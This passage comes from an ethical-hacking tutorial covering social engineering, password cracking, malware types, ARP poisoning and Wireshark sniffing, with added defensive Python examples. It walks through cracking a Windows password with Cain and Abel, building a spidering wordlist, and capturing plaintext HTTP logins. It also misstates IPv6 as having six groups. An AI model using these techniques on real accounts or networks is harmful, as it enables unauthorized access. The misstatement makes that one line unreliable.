  • Familiarity Exploit: Users are less suspicious of people they are familiar with. An attacker can familiarize him/herself with the users of the target system prior to the social engineering attack. The attacker may interact with users during meals, join them when they are smoking, attend social events, etc. This makes the attacker familiar to the users. Let’s suppose that the user works in a building that requires an access code or card to gain access; the attacker may follow the users as they enter such places. The users are most likely to hold the door open for the attacker to go in as they are familiar with them. The attacker can also ask for answers to questions such as where you met your spouse, the name of your high school math teacher, etc. The users are most likely to reveal answers as they trust the familiar face. This information could be used to hack email accounts and other accounts that ask similar questions if one forgets their password.

  • Intimidating Circumstances: People tend to avoid people who intimidate others around them. Using this technique, the attacker may pretend to have a heated argument on the phone or with an accomplice in the scheme. The attacker may then ask users for information which would be used to compromise the security of the users’ system. The users are most likely to give the correct answers just to avoid having a confrontation with the attacker. This technique can also be used to avoid being checked at a security checkpoint.

  • Phishing: This technique uses trickery and deceit to obtain private data from users. The social engineer may try to impersonate a genuine website such as Yahoo and then ask the unsuspecting user to confirm their account name and password. This technique could also be used to get credit card information or any other valuable personal data.

  • Tailgating: This technique involves following users from behind as they enter restricted areas. As a human courtesy, the user is most likely to let the social engineer inside the restricted area.

  • Exploiting human curiosity: Using this technique, the social engineer may deliberately drop a virus-infected flash disk in an area where the users can easily pick it up. The user will most likely plug the flash disk into the computer. The flash disk may auto-run the virus, or the user may be tempted to open a file with a name such as Employees Revaluation Report 2013.docx which may actually be an infected file.

  • Exploiting human greed: Using this technique, the social engineer may lure the user with promises of making a lot of money online by filling in a form and confirming their details, including credit card details, etc.

Social Engineering Counter Measures

 

Most techniques employed by social engineers involve manipulating human biases. To counter such techniques, an organization can:

  • To counter the familiarity exploit, the users must be trained not to substitute familiarity for security measures. Even the people that they are familiar with must prove that they have the authorization to access certain areas and information.

  • To counter intimidating circumstances attacks, users must be trained to identify social engineering techniques that fish for sensitive information and politely say no.

  • To counter phishing techniques, most sites such as Yahoo use secure connections to encrypt data and prove that they are who they claim to be. Checking the URL may help you spot fake sites. Avoid responding to emails that request you to provide personal information.

  • To counter tailgating attacks, users must be trained not to let others use their security clearance to gain access to restricted areas. Each user must use their own access clearance. 

  • To counter human curiosity, it’s better to hand picked-up flash disks to system administrators, who should scan them for viruses or other infections, preferably on an isolated machine.

  • To counter techniques that exploit human greed, employees must be trained on the dangers of falling for such scams.
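Added Python example for the phishing countermeasure above (checking the URL); it is not code from the original tutorial. The check assumes the expected registrable domain is known (yahoo.com, since the text uses Yahoo as its example) and accepts only HTTPS links whose host is that domain or one of its sub-domains. The look-alike links it rejects are constructed, using the reserved .test and .example names.

```python
from urllib.parse import urlsplit


def check_login_url(url, expected_domain):
    """Return (ok, reason). A link is accepted only if it uses HTTPS and its
    host is exactly `expected_domain` or a sub-domain of it. `expected_domain`
    is assumed to be the registrable domain, e.g. "yahoo.com"."""
    parts = urlsplit(url)
    host = parts.hostname  # lower-cased; user-info and port already stripped
    if not host:
        return False, "no host name in link"
    if parts.scheme != "https":
        return False, "connection is not HTTPS, so the site cannot prove who it is"
    # Non-ASCII or punycode (xn--) labels can render as look-alike letters.
    if not host.isascii() or any(label.startswith("xn--") for label in host.split(".")):
        return False, "internationalised host name; possible look-alike characters"
    if host == expected_domain or host.endswith("." + expected_domain):
        return True, f"host {host} belongs to {expected_domain}"
    # The expected name appearing *somewhere* in the link is the usual trick:
    # as a prefix of an unrelated domain, or in the user-info part before '@'.
    if expected_domain in host or expected_domain in (parts.username or ""):
        return False, f"'{expected_domain}' appears in the link but the real host is {host}"
    return False, f"host {host} is unrelated to {expected_domain}"


if __name__ == "__main__":
    # Constructed links; the fakes use reserved .test / .example names.
    for link in (
        "https://login.yahoo.com/",
        "http://login.yahoo.com/",
        "https://yahoo.com.account-verify.test/login",
        "https://www.yahoo.com@secure-mail.example/",
    ):
        ok, reason = check_login_url(link, "yahoo.com")
        print("OK  " if ok else "FAKE", link, "-", reason)
```

The decisive test is the suffix match on the host name, not whether the familiar name appears in the link: a user reading left to right sees "yahoo.com" in both fakes, while the browser connects to whatever follows the last "@" and precedes the first "/".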

Summary

  • Social engineering is the art of exploiting the human element to gain access to unauthorized resources.

  • Social engineers use a number of techniques to fool the users into revealing sensitive information.

  • Organizations must have security policies that have social engineering countermeasures.

What is Password Cracking?

Password cracking is the process of attempting to gain unauthorized access to restricted systems using common passwords or algorithms that guess passwords. In other words, it’s the art of obtaining the correct password that gives access to a system protected by an authentication method.

Password cracking employs a number of techniques to achieve its goals. The cracking process can involve either comparing stored passwords against a word list or using algorithms to generate passwords that match.

In this Tutorial, we will introduce you to the common password cracking techniques and the countermeasures you can implement to protect systems against such attacks.


What is password strength?

Password strength is the measure of a password’s ability to resist password cracking attacks. The strength of a password is determined by;

  • Length: the number of characters the password contains.

  • Complexity: does it use a combination of letters, numbers, and symbols?

  • Unpredictability: is it something that can be guessed easily by an attacker?

Let’s now look at a practical example. We will use three passwords namely

1.  password

2.  password1

3.  #password1$

For this example, we will use the password strength indicator of Cpanel when creating passwords. Cpanel reports the following strengths for each of the above-listed passwords.

Note: for the password password, the strength is 1, and it’s very weak.

Note: for the password password1, the strength is 28, and it’s still weak.

Note: for the password #password1$, the strength is 60, and it’s strong.

The higher the strength number, the better the password.
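An added Python example (neither cPanel's meter nor code from the original tutorial) that scores a password on the three factors just listed. Besides length and character classes, it checks the unpredictability factor against a small constructed denylist of common passwords and, optionally, organisation-specific terms of the kind that can be harvested from a company's public material. The scale is the example's own, so the numbers differ from the Cpanel readings above, but the ordering of the three sample passwords is the same.

```python
import re

# Constructed denylist. Real deployments use a large breached-password list
# plus terms harvested from the organisation's own public material.
COMMON_PASSWORDS = {"password", "qwerty", "admin", "123456", "letmein", "welcome"}

# Undo the usual "leet" substitutions so that p@$$w0rd is recognised as password.
DELEET = str.maketrans({"@": "a", "$": "s", "0": "o", "3": "e", "!": "i"})


def character_classes(password):
    """Count of distinct classes used: lower case, upper case, digits, symbols."""
    checks = (str.islower, str.isupper, str.isdigit, lambda c: not c.isalnum())
    return sum(any(check(c) for c in password) for check in checks)


def predictable_terms(password, org_terms=()):
    """Denylisted words found inside the password, checked both as typed and
    after undoing leet substitutions. Returns a sorted list."""
    raw = re.sub(r"[^a-z0-9]", "", password.lower())
    deleeted = re.sub(r"[^a-z0-9]", "", password.lower().translate(DELEET))
    terms = COMMON_PASSWORDS | {t.lower() for t in org_terms}
    return sorted(t for t in terms if t in raw or t in deleeted)


def strength_report(password, org_terms=(), min_length=12):
    """Score 0-100 built from the three factors in the text (length,
    complexity, unpredictability) plus the concrete problems found."""
    issues = []
    length_points = min(len(password), 16) * 50 // 16      # up to 50
    if len(password) < min_length:
        issues.append(f"shorter than {min_length} characters")
    classes = character_classes(password)
    class_points = classes * 30 // 4                          # up to 30
    if classes < 3:
        issues.append("uses fewer than three character classes")
    found = predictable_terms(password, org_terms)
    if found:
        issues.append("built on predictable term(s): " + ", ".join(found))
    unpredictability_points = 0 if found else 20              # all or nothing
    return {"score": length_points + class_points + unpredictability_points,
            "issues": issues}


if __name__ == "__main__":
    for candidate in ("password", "password1", "#password1$", "p@$$w0rd"):
        print(candidate, strength_report(candidate, org_terms=["acme", "1976"]))
```

Note that a dictionary word with a symbol or digit bolted on, like #password1$, still reports a predictability issue even though it scores higher than the other two: a character-class meter alone cannot see that the core of the password is in every wordlist, which is why a policy check should include a denylist as well as a score.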

Let’s suppose that we have to store the above passwords as MD5 hashes. We will use an online MD5 hash generator to convert our passwords into MD5 hashes.

The table below shows the password hashes:

Password        MD5 Hash                            Cpanel Strength Indicator
password        5f4dcc3b5aa765d61d8327deb882cf99    1
password1       7c6a180b36896a0a8c02787eeafb0e4c    28
#password1$     29e08fb7103c327d68327f23d8d9256c    60

 

We will now use http://www.md5this.com/ to crack the above hashes. The images below show the password cracking results for the above passwords.


As you can see from the above results, we managed to crack the first and second passwords that had lower strength numbers. We didn’t manage to crack the third password which was longer, complex and unpredictable. It had a higher strength number.

Password cracking techniques

There are a number of techniques that can be used to crack passwords. We will describe the most commonly used ones below;

  • Dictionary attack– This method involves the use of a wordlist to compare against user passwords.

  • Brute force attack– This method is similar to the dictionary attack. Brute force attacks use algorithms that combine alpha-numeric characters and symbols to come up with passwords for the attack. For example, a password of the value “password” can also be tried as p@$$word using the brute force attack.

  • Rainbow table attack– This method uses pre-computed hashes. Let’s assume that we have a database which stores passwords as md5 hashes. We can create another database that has md5 hashes of commonly used passwords. We can then compare the password hash we have against the stored hashes in the database. If a match is found, then we have the password.

  • Guess– As the name suggests, this method involves guessing. Passwords such as qwerty, password, admin, etc. are commonly used or set as default passwords. If they have not been changed or if the user is careless when selecting passwords, then they can be easily compromised.

  • Spidering– Most organizations use passwords that contain company information. This information can be found on company websites, social media such as Facebook, Twitter, etc. Spidering gathers information from these sources to come up with word lists. The word list is then used to perform dictionary and brute force attacks.

Spidering sample dictionary attack wordlist

1976 <founder birth year>
smith jones <founder name>
acme <company name/initials>
built|to|last <words in company vision/mission>
golfing|chess|soccer <founders’ hobbies>

 

Password cracking tool

These are software programs that are used to crack user passwords. We already looked at a similar tool in the above example on password strengths. The website www.md5this.com uses a rainbow table to crack passwords. We will now look at some of the commonly used tools.

John the Ripper

John the Ripper uses the command prompt to crack passwords. This makes it suitable for advanced users who are comfortable working with commands. It uses a wordlist to crack passwords. The program is free, but the word list has to be bought. It has free alternative word lists that you can use. Visit the product website http://www.openwall.com/john/ for more information and how to use it.

Cain & Abel

Cain & Abel runs on Windows. It is used to recover passwords for user accounts, recover Microsoft Access passwords, sniff networks, etc. Unlike John the Ripper, Cain & Abel uses a graphical user interface. It is very common among newbies and script kiddies because of its simplicity of use. Visit the product website http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml for more information and how to use it.

Ophcrack

Ophcrack is a cross-platform Windows password cracker that uses rainbow tables to crack passwords. It runs on Windows, Linux and Mac OS. It also has a module for brute force attacks among other features. Visit the product website http://ophcrack.sourceforge.net/ for more information and how to use it.

Password Cracking Counter Measures

An organization can use the following methods to reduce the chances of passwords being cracked:

  • Avoid short and easily predictable passwords

  • Avoid using passwords with predictable patterns such as 11552266.

  • Passwords stored in the database must always be stored in hashed form, never as plain text. For MD5 hashes, it is better to salt the passwords before hashing them. Salting involves adding some value to the provided password before creating the hash, so that identical passwords do not produce identical hashes.

  • Most registration systems have password strength indicators; organizations must adopt policies that favor high password strength numbers.
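The rainbow table lookup described under the cracking techniques above and the salting countermeasure in the list just given, side by side. This is an added Python example, not code from the original tutorial or from md5this.com: the wordlist is constructed, the MD5 values it matches for password and password1 are the ones in the table earlier in this section, and the salted scheme uses PBKDF2-HMAC-SHA256 from the standard library (a swapped-in slow, salted hash; the text itself only calls for salting MD5).

```python
import hashlib
import hmac
import os

# Constructed wordlist of the kind a cracking dictionary or rainbow table is
# built from; real lists contain millions of entries.
WORDLIST = ["123456", "password", "qwerty", "password1", "letmein", "admin"]


def md5_hex(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def build_lookup_table(words):
    """Precompute hash -> plaintext for every word; this is what a lookup
    service such as the one used above keeps on file."""
    return {md5_hex(w): w for w in words}


def lookup_unsalted(md5_hash: str, table):
    """Unsalted MD5 falls to a plain dictionary lookup: one precomputation
    serves every user and every site. Returns the plaintext or None."""
    return table.get(md5_hash.lower())


def hash_password_salted(password: str, salt: bytes = None,
                         iterations: int = 600_000) -> str:
    """Salted, slow hash: a random per-user salt makes precomputed tables
    useless, and the iteration count makes each guess expensive. The record
    stores everything needed to verify later."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_salted(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count and compare in
    constant time."""
    _algo, iterations, salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def lookup_salted(record: str, table):
    """The same precomputed table never matches a salted record, because the
    stored value depends on the salt as well as the password."""
    return table.get(record.split("$")[-1])


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    for pw in ("password", "password1", "#password1$"):
        print(f"{pw:12s} unsalted md5 -> {lookup_unsalted(md5_hex(pw), table)!r:12} "
              f"salted record -> {lookup_salted(hash_password_salted(pw), table)!r}")
```

Two things change between the halves: the salt means the attacker must redo the work per user instead of once per wordlist, and the iteration count means each of those guesses costs hundreds of thousands of hash operations instead of one.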

Hacking Activity: Hack Now!

In this practical scenario, we are going to crack a Windows account with a simple password. Windows stores account passwords as NTLM hashes. We will use the NTLM cracker tool in Cain and Abel to do that.

Cain and Abel cracker can be used to crack passwords using;

  • Dictionary attack

  • Brute force

  • Cryptanalysis

We will use the dictionary attack in this example. You will need to download the dictionary attack wordlist 10k-Most-Common.zip.

For this demonstration, we have created an account called Accounts with the password qwerty on Windows 7.


Password cracking steps

  • Open Cain and Abel, you will get the following main screen

  • Make sure the cracker tab is selected as shown above

  • Click on the Add button on the toolbar.

  • The following dialog window will appear

  • The local user accounts will be displayed as follows. Note the results shown will be of the user accounts on your local machine.

  • Right click on the account you want to crack. For this tutorial, we will use Accounts as the user account.

  • The following screen will appear

  • Right click on the dictionary section and select Add to list menu as shown above

  • Browse to the 10k most common.txt file that you just downloaded

  • Click on start button

  • If the user used a simple password like qwerty, then you should be able to get the following results.

  • Note: the time taken to crack the password depends on the password strength, complexity and processing power of your machine.

  • If the password is not cracked using a dictionary attack, you can try brute force or cryptanalysis attacks.

Summary

  • Password cracking is the art of recovering stored or transmitted passwords.

  • Password strength is determined by the length, complexity, and unpredictability of a password value.

  • Common password cracking techniques include dictionary attacks, brute force, rainbow tables, spidering and guessing.

  • Password cracking tools simplify the process of cracking passwords.

Worm, Virus & Trojan Horse: Ethical Hacking Tutorial

Some of the skills that hackers have are programming and computer networking skills. They often use these skills to gain access to systems. The objective of targeting an organization would be to steal sensitive data, disrupt business operations or physically damage computer controlled equipment. Trojans, viruses, and worms can be used to achieve the above-stated objectives.

In this article, we will introduce you to some of the ways that hackers can use Trojans, viruses, and worms to compromise a computer system. We will also look at the countermeasures that can be used to protect against such activities.


What is a Trojan horse?

A Trojan horse is a program that allows the attacker to control the user’s computer from a remote location. The program is usually disguised as something that is useful to the user. Once the user has installed the program, it has the ability to install malicious payloads, create backdoors, install other unwanted applications that can be used to compromise the user’s computer, etc.

The list below shows some of the activities that the attacker can perform using a Trojan horse.

  • Use the user’s computer as part of the Botnet when performing distributed denial of service attacks.

  • Damage the user’s computer (crashing, blue screen of death, etc.)

  • Stealing sensitive data such as stored passwords, credit card information, etc.

  • Modifying files on the user’s computer

  • Electronic money theft by performing unauthorized money transfer transactions

  • Log all the keys that a user presses on the keyboard and send the data to the attacker. This method is used to harvest user ids, passwords, and other sensitive data.

  • Viewing screenshots of the user’s screen

  • Downloading browsing history data

What is a worm?

 


 

A worm is a malicious computer program that replicates itself usually over a computer network. An attacker may use a worm to accomplish the following tasks;

  • Install backdoors on the victim’s computers. The created backdoor may be used to create zombie computers that are used to send spam emails, perform distributed denial of service attacks, etc. The backdoors can also be exploited by other malware.

  • Worms may also slow down the network by consuming bandwidth as they replicate.

  • Install harmful payload code carried within the worm.

What is a Virus?

A virus is a computer program that attaches itself to legitimate programs and files without the user’s consent. Viruses can consume computer resources such as memory and CPU time. The attacked programs and files are said to be “infected”. A computer virus may be used to;

  • Access private data such as user id and passwords

  • Display annoying messages to the user

  • Corrupt data in your computer

  • Log the user’s keystrokes

Computer viruses have been known to employ social engineering techniques. These techniques involve deceiving the users to open the files which appear to be normal files such as Word or Excel documents. Once the file is opened, the virus code is executed and does what it’s intended to do.

Trojans, Viruses, and Worms counter measures

To protect against such attacks, an organization can use the following methods.

  • A policy that prohibits users from downloading unnecessary files from the Internet such as spam email attachments, games, programs that claim to speed up downloads, etc.

  • Anti-virus software must be installed on all user computers. The anti-virus software should be updated frequently, and scans must be performed at specified time intervals.

  • Scan external storage devices on an isolated machine especially those that originate from outside the organization.

  • Regular backups of critical data must be made and stored on preferably read-only media such as CDs and DVDs.

  • Worms exploit vulnerabilities in the operating systems. Downloading operating system updates can help reduce the infection and replication of worms.

  • Worms can also be avoided by scanning all email attachments before downloading them.

Trojan, Virus, and Worm Differential Table

Definition

  • Trojan: Malicious program used to control a victim’s computer from a remote location.

  • Virus: Self-replicating program that attaches itself to other programs and files.

  • Worm: Illegitimate program that replicates itself, usually over the network.

Purpose

  • Trojan: Steal sensitive data, spy on the victim’s computer, etc.

  • Virus: Disrupt normal computer usage, corrupt user data, etc.

  • Worm: Install backdoors on the victim’s computer, slow down the user’s network, etc.

Counter Measures (all three)

  • Use of anti-virus software, update patches for operating systems, security policy on usage of the internet and external storage media, etc.

 

Learn ARP Poisoning with Examples

What are IP and MAC Addresses?

IP Address is the acronym for Internet Protocol address.  An internet protocol address is used to uniquely identify a computer or device such as printers, storage disks on a computer network. There are currently two versions of IP addresses. IPv4 uses 32-bit numbers. Due to the massive growth of the internet, IPv6 has been developed, and it uses 128-bit numbers.

IPv4 addresses are formatted in four groups of numbers separated by dots. The minimum number is 0, and the maximum number is 255. An example of an IPv4 address looks like this;

127.0.0.1

IPv6 addresses are formatted in groups of six numbers separated by colons. Each group is written as four hexadecimal digits. An example of an IPv6 address looks like this;

2001:0db8:85a3:0000:0000:8a2e:0370:7334

In order to simplify the representation of IP addresses in text format, leading zeros within a group are omitted, and a single run of consecutive all-zero groups is replaced by a double colon. The above address in simplified format is displayed as;

2001:db8:85a3::8a2e:370:7334

MAC Address is the acronym for media access control address. MAC addresses are used to uniquely identify network interfaces for communication at the physical layer of the network. MAC addresses are usually embedded into the network card.

A MAC address is like a serial number of a phone while the IP address is like the phone number.
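The address forms just described, checked in code. This is an added Python example, not part of the original tutorial: it uses the standard ipaddress module on the page's own sample addresses, and a hand-written pattern for MAC addresses in either the Windows form (60-36-DD-A6-C5-43, as shown in the exercise below) or the colon-separated form.

```python
import ipaddress
import re

# Accepts the Windows form 60-36-DD-A6-C5-43 and the colon form 60:36:dd:a6:c5:43,
# six two-digit hex groups with one consistent separator (group 2) throughout.
MAC_RE = re.compile(r"^([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}$")


def describe_ip(text):
    """Parse an IP address and report its version, size in bits, and both the
    fully written-out and the simplified textual forms. Raises ValueError for
    anything that is not a valid address (e.g. an IPv4 octet above 255)."""
    addr = ipaddress.ip_address(text)
    return {
        "version": addr.version,
        "bits": addr.max_prefixlen,       # 32 for IPv4, 128 for IPv6
        "exploded": addr.exploded,        # every group written in full
        "compressed": addr.compressed,    # leading zeros and one zero run removed
    }


def is_valid_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def normalise_mac(text):
    """Return the MAC address in lower-case colon form, or None if malformed."""
    if not MAC_RE.match(text):
        return None
    return text.lower().replace("-", ":")


if __name__ == "__main__":
    for sample in ("127.0.0.1", "2001:0db8:85a3:0000:0000:8a2e:0370:7334"):
        print(describe_ip(sample))
    print(normalise_mac("60-36-DD-A6-C5-43"))
```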

Exercise

We will assume you are using Windows for this exercise. Open the command prompt.

Enter the command

ipconfig /all

You will get detailed information about all the network connections available on your computer. The results shown below are for a broadband modem to show the MAC address and IPv4 format and wireless network to show IPv6 format.


What is ARP Poisoning?

ARP is the acronym for Address Resolution Protocol. It is used to convert IP address to physical addresses [MAC address] on a switch.  The host sends an ARP broadcast on the network, and the recipient computer responds with its physical address [MAC Address].  The resolved IP/MAC address is then used to communicate. ARP poisoning is sending fake MAC addresses to the switch so that it can associate the fake MAC addresses with the IP address of a genuine computer on a network and hijack the traffic.

ARP Poisoning Countermeasures

Static ARP entries: these can be defined in the local ARP cache and the switch configured to ignore all auto ARP reply packets. The disadvantage of this method is, it’s difficult to maintain on large networks. IP/MAC address mapping has to be distributed to all the computers on the network.

ARP poisoning detection software: these systems can be used to cross check the IP/MAC address resolution and certify them if they are authenticated. Uncertified IP/MAC address resolutions can then be blocked.

Operating System Security: this measure is dependent on the operating system being used. The following are the basic techniques used by various operating systems.

  • Linux based: these work by ignoring unsolicited ARP reply packets.

  • Microsoft Windows: the ARP cache behavior can be configured via the registry. The following list includes some of the software that can be used to protect networks against sniffing;

      • AntiARP– provides protection against both passive and active sniffing

      • Agnitum Outpost Firewall– provides protection against passive sniffing

      • XArp– provides protection against both passive and active sniffing

  • Mac OS: ArpGuard can be used to provide protection. It protects against both active and passive sniffing.

 

Hacking Activity: Configure ARP entries in Windows

We are using Windows 7 for this exercise, but the commands should work on other versions of Windows as well.

Open the command prompt and enter the following command

arp -a

HERE,

  • arp calls the ARP configuration program located in the Windows/System32 directory

  • -a is the parameter to display the contents of the ARP cache

You will get results similar to the following


Note: dynamic entries are added and deleted automatically when using TCP/IP sessions with remote computers.

Static entries are added manually and are deleted when the computer is restarted, when the network interface card is restarted, or by other activities that affect it.
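An added Python example (not from the original tutorial) for reading the arp -a output shown above and spotting the condition that the countermeasures section leaves to ARP poisoning detection software: one unicast MAC address answering for two IP addresses. The sample table is constructed in the Windows layout, reusing the page's MAC 60-36-DD-A6-C5-43 as the gateway's and its 192.168.1.x range; the second dynamic entry that repeats that MAC is the planted indicator. The example also checks whether the gateway has the static entry the text recommends.

```python
import re

# Constructed `arp -a` output in the Windows layout. The entry for
# 192.168.1.20 reuses the gateway's MAC, which is what a poisoned cache looks
# like after a host has answered ARP on the gateway's behalf.
SAMPLE_ARP_OUTPUT = """
Interface: 192.168.1.38 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           60-36-dd-a6-c5-43     dynamic
  192.168.1.20          60-36-dd-a6-c5-43     dynamic
  192.168.1.55          a4-5e-60-11-22-33     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# One cache row: dotted IPv4, dash-separated MAC, and the entry type.
ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(static|dynamic)\s*$",
    re.IGNORECASE,
)


def parse_arp_table(text):
    """Return a list of {"ip", "mac", "type"} dicts, one per cache entry.
    Header and interface lines do not match the pattern and are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"ip": m.group(1), "mac": m.group(2).lower(),
                            "type": m.group(3).lower()})
    return entries


def is_unicast(mac):
    """Broadcast and multicast MACs legitimately map to many addresses; only
    unicast ones (least significant bit of the first octet clear) are checked."""
    return int(mac.split("-")[0], 16) & 1 == 0


def find_shared_macs(entries):
    """Unicast MACs claimed by more than one IP: the classic sign that some
    host is impersonating another (typically the gateway)."""
    ips_by_mac = {}
    for e in entries:
        if is_unicast(e["mac"]):
            ips_by_mac.setdefault(e["mac"], []).append(e["ip"])
    return {mac: ips for mac, ips in ips_by_mac.items() if len(ips) > 1}


def gateway_is_pinned(entries, gateway_ip):
    """True if the gateway has a static entry, i.e. the static-ARP
    countermeasure from the text is in place on this host."""
    return any(e["ip"] == gateway_ip and e["type"] == "static" for e in entries)


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_OUTPUT)
    print("shared unicast MACs:", find_shared_macs(table))
    print("gateway pinned with a static entry:", gateway_is_pinned(table, "192.168.1.1"))
```

A shared MAC is an indicator, not proof: some legitimate setups (a router answering for several of its own addresses, proxy ARP) produce the same picture, so the finding is something to confirm against the switch's port table rather than to act on blindly.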

Adding static entries

Open the command prompt then use the ipconfig /all command to get the IP and MAC address

The MAC address is shown as the Physical Address and the IP address as the IPv4 Address.

Enter the following command

arp -s 192.168.1.38 60-36-DD-A6-C5-43


Note: The IP and MAC address will be different from the ones used here. This is because they are unique.

Use the following command to view the ARP cache

arp -a

You will get the following results


Note the IP address has been resolved to the MAC address we provided and it is of a static type.

Deleting an ARP cache entry

Use the following command to remove an entry

arp -d 192.168.1.38

P.S. ARP poisoning works by sending fake MAC addresses to the switch

Wireshark Tutorial: Network & Passwords Sniffer

Computers communicate using networks. These networks could be on a local area network (LAN) or exposed to the internet. Network sniffers are programs that capture low-level packet data that is transmitted over a network. An attacker can analyze this information to discover valuable information such as user ids and passwords.

In this article, we will introduce you to common network sniffing techniques and tools used to sniff networks. We will also look at countermeasures that you can put in place to protect sensitive information being transmitted over a network.

What is network sniffing?

Computers communicate by broadcasting messages on a network using IP addresses. Once a message has been sent on a network, the recipient computer with the matching IP address responds with its MAC address.

Network sniffing is the process of intercepting data packets sent over a network. This can be done by a specialized software program or hardware equipment. Sniffing can be used to;

  • Capture sensitive data such as login credentials

  • Eavesdrop on chat messages

  • Capture files being transmitted over a network

The following are protocols that are vulnerable to sniffing

  • Telnet

  • Rlogin

  • HTTP

  • SMTP

  • NNTP

  • POP

  • FTP

  • IMAP

The above protocols are vulnerable if login details are sent in plain text.

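An added Python example (not from the original tutorial) showing what "sent in plain text" means for two of the protocols listed: it reconstructs a login form submitted over plain HTTP and an FTP control-channel exchange, both constructed here rather than captured, and extracts the credential fields from each. The same parsing, run over real captures, is how a monitoring tool flags plaintext credential exposure on a network.

```python
import re
from urllib.parse import parse_qs

# Form field names that commonly carry credentials.
CREDENTIAL_FIELD_RE = re.compile(r"(pass|pwd|secret|token|user|login|email)", re.IGNORECASE)


def build_http_login_post():
    """Constructed capture: what a sniffer sees when a browser submits a login
    form over plain HTTP. Built here so Content-Length is always correct."""
    body = "email=user%40example.test&password=Passw0rd%21"
    headers = (
        "POST /login.php HTTP/1.1\r\n"
        "Host: www.example.test\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    )
    return headers + body


# Constructed FTP control-channel exchange; like Telnet, POP and IMAP, FTP
# carries the user name and password as readable commands.
FTP_SESSION = [
    ("server", "220 FTP server ready"),
    ("client", "USER alice"),
    ("server", "331 Password required for alice"),
    ("client", "PASS s3cret"),
    ("server", "230 User logged in"),
]


def parse_http_request(raw):
    """Split a raw HTTP request into (method, path, headers dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def find_http_credentials(raw):
    """Credential-looking form fields sent in the clear, percent-decoded.
    Empty dict when the request is not a form POST or carries none."""
    method, _path, headers, body = parse_http_request(raw)
    if method != "POST" or "x-www-form-urlencoded" not in headers.get("content-type", ""):
        return {}
    fields = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()
            if CREDENTIAL_FIELD_RE.search(name)}


def find_ftp_credentials(session):
    """USER/PASS arguments sent by the client side of an FTP exchange."""
    found = {}
    for side, line in session:
        if side != "client":
            continue
        command, _, argument = line.partition(" ")
        if command.upper() in ("USER", "PASS"):
            found[command.upper()] = argument
    return found


if __name__ == "__main__":
    print("HTTP:", find_http_credentials(build_http_login_post()))
    print("FTP: ", find_ftp_credentials(FTP_SESSION))
```

Nothing here decrypts anything; the parsing is trivial precisely because these protocols put the secret on the wire as text, which is the whole case for the TLS-protected variants (HTTPS, FTPS, POP3S, IMAPS, SSH in place of Telnet and rlogin).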

Passive and Active Sniffing

Before we look at passive and active sniffing, let’s look at two major devices used to network computers; hubs and switches.

A hub works by sending broadcast messages to all output ports on it except the one that has sent the broadcast. The recipient computer responds to the broadcast message if the IP address matches. This means when using a hub, all the computers on a network can see the broadcast message. It operates at the physical layer (layer 1) of the OSI Model.

The diagram below illustrates how the hub works.


A switch works differently; it maps IP/MAC addresses to physical ports on it. Broadcast messages are sent to the physical ports that match the IP/MAC address configurations for the recipient computer. This means broadcast messages are only seen by the recipient computer. Switches operate at the data link layer (layer 2) and network layer (layer 3).

The diagram below illustrates how the switch works.


Passive sniffing is intercepting packages transmitted over a network that uses a hub. It is called passive sniffing because it is difficult to detect. It is also easy to perform as the hub sends broadcast messages to all the computers on the network.

Active sniffing is intercepting packets transmitted over a network that uses a switch. Because the switch delivers a unicast frame only to its destination port, the attacker has to inject traffic to redirect it, which is why it is called active and why it can be detected. There are two main methods used to sniff switched networks: ARP poisoning (sending forged ARP replies so that victims send their traffic to the attacker's MAC address) and MAC flooding.

Hacking Activity: Sniff network traffic

In this practical scenario, we are going to use Wireshark to sniff data packets as they are transmitted over the HTTP protocol. We will start a capture in Wireshark, then log in to a web application that does not use secure communication (plain HTTP, no TLS). We will log in to the web application at http://www.techpanda.org/

 

The login address is admin@google.com , and the password is Password2010.

Note: we will log in to the web app for demonstration purposes only. The technique also captures data packets from other computers on the same network segment as the one you are sniffing from (on a hub, or on a switch after ARP poisoning or MAC flooding). The capture is not limited to techpanda.org; Wireshark records all HTTP and other protocol traffic that reaches your interface.

Sniffing the network using Wireshark

The illustration below shows you the steps that you will carry out to complete this exercise without confusion


Download Wireshark from this link http://www.wireshark.org/download.html

  • Open Wireshark

  • You will get the following screen


  • Select the network interface you want to sniff. Note: for this demonstration, we are using a wireless network connection. If you are on a wired local area network, select the Ethernet interface instead.

  • Click on start button as shown above


  • The login email is admin@google.com and the password is Password2010

  • Click on submit button

  • A successful logon should give you the following dashboard


  • Go back to Wireshark and stop the live capture


  • Filter for HTTP traffic only by typing http in the filter textbox


  • Locate the Info column, look for entries with the HTTP verb POST and click on one


  • Just below the packet list there is a packet details panel. Expand the entry that says Line-based text data: application/x-www-form-urlencoded


  • You should be able to view the plaintext values of all the POST variables submitted to the server over HTTP, including the email address and password typed above.
